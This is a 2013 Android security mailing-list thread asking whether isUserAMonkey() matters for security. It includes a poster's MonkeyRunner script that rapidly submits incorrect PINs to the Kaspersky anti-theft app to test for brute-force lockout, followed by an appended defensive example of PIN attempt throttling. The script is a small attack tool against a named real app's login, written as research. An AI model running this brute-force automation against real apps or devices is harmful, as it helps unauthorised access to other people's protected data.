Hi reox, thanks for the reply :)

I should frame this problem a bit better; so here goes...

Recently I've been surveying some high-end apps on the PlayStore to see how 
well they protect against brute-force protection;
and what I found was that a lot of the password manager and anti-theft apps 
actually don't have much protection at all i.e. if I can still successfully
auth after submitting around 20-30 successively incorrect login attempts 
then there is no protection.

So the next challenge was to find a way to rapidly and programmatically 
submit login attempts to the apps; 
the answer I came up with was to abuse the MonkeyRunner framework, 
here's a PoC I whipped up against the Kaspersky anti-theft app:
"
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
device = MonkeyRunner.waitForConnection()
valid_login = "12345"
# do hordes of incorrect login attempts, and hope to get locked out or CAPTCHA'd

for attempt in list_of_pins:  # set this for about a 100 rapid attempts
    # type pin into textbox, it's the only editText and it grabs focus so I
    # don't need to know its screen position
    device.type(attempt)
    device.touch(360, 366, "DOWN")  # press the "Sign in" button and wait for the magic...

# submit a valid login attempt and see if we can actually still auth
device.type(valid_login)  # <--- valid login
device.touch(360, 366, "DOWN")
"
#the above code is configured to work on a Samsung S3, I imagine the last 
touch input co-ords would be set differently per device depending on 
screen-size and orientation

So would it be fair to say then, that developers should make use of this call, 
if components of their applications that handle "Login/Authentication" 
services/actions
don't properly protect against brute-force attacks, given that the 
MonkeyRunner can be abused in the following way?

On Wednesday, August 7, 2013 9:55:54 AM UTC+2, reox wrote:
>
> I think the problem could be that most automated sandboxes use the monkey 
> to trigger malicious behaviour. So this would be a perfect anti-vm 
> technique.
>
> Oliver Hill <olly....@gmail.com> wrote:
>
> As far as I can tell, isUserAMonkey() is used to stop the Monkey doing 
> something bad during the test, like encrypting the phone or setting up a 
> lock screen: in those cases, it just says "the button was pressed 
> successfully" but doesn't actually carry out the action.
>
> I don't think it really has any actual security implications at all, it's 
> just used to stop the monkey doing something stupid. I'm not sure what you 
> mean about trusting input: are you thinking someone might fake being a 
> monkey?
>
> On Monday, 5 August 2013 20:17:47 UTC+1, Keith Makan wrote:
>>
>>
>> Hi Guys,
>>
>> I've been wondering about this strange method in the ActivityManager 
>> Class 
>> ActivityManager.isUserAMonkey()<http://developer.android.com/reference/android/app/ActivityManager.html#isUserAMonkey()>
>> Relax, I know what it's for, basically to make sure that an application can 
>> differentiate between touch, text or other input coming
>> from the user and input coming from the MonkeyRunner testing Framework. 
>> Lately I've been testing a couple very popular apps for this though
>> no one really seems to care 0_o...
>>
>> *My question is,* are there any security related concerns/issues around 
>> not making this call, before trusting input too much?
>>
>> Regards and Thanks
>> k3
>>
>  -- 
> You received this message because you are subscribed to the Google Groups 
> "Android Security Discussions" group.
>
> To post to this group, send email to android-secu...@googlegroups.com.
> Visit this group at 
> http://groups.google.com/group/android-security-discuss.
> For more options, visit https://groups.google.com/groups/opt_out.
>  
>  
>
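
The lockout behaviour the survey in this message tests for, as an added example (not code from the thread or from any app named in it): failed PIN attempts are counted, a lockout that doubles with each further failure is applied, and while it is active even the valid PIN is refused, whatever generated the input. The class and function names, the policy constants and the fake clock are assumptions; the PIN "12345" is the sample value from the post.

```python
import hashlib
import hmac
import os


class FakeClock:
    """Constructed time source so the example runs instantly and offline."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


class PinThrottle:
    FREE_ATTEMPTS = 5      # assumed policy: failures allowed before any lockout
    BASE_DELAY = 30        # assumed: seconds locked after the 5th failure
    MAX_DELAY = 24 * 3600  # assumed cap on a single lockout

    def __init__(self, pin, clock):
        self._salt = os.urandom(16)
        self._digest = self._derive(pin)
        self._clock = clock
        self.failures = 0        # a real app persists these two fields so that
        self.locked_until = 0.0  # restarting the app does not reset them

    def _derive(self, pin):
        return hashlib.pbkdf2_hmac("sha256", pin.encode(), self._salt, 100_000)

    def try_login(self, pin):
        # Applied to every attempt, however the input was generated.
        now = self._clock()
        if now < self.locked_until:
            return "locked"      # the PIN is not even compared while locked
        if hmac.compare_digest(self._derive(pin), self._digest):
            self.failures = 0
            return "ok"
        self.failures += 1
        over = self.failures - self.FREE_ATTEMPTS
        if over >= 0:            # lockout doubles with each further failure
            delay = min(self.BASE_DELAY * 2 ** over, self.MAX_DELAY)
            self.locked_until = now + delay
        return "denied"


def rapid_attempts(throttle, wrong_pins, valid_pin):
    """The survey from the post: many wrong PINs, then the valid one."""
    outcomes = [throttle.try_login(p) for p in wrong_pins]
    return outcomes, throttle.try_login(valid_pin)
```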
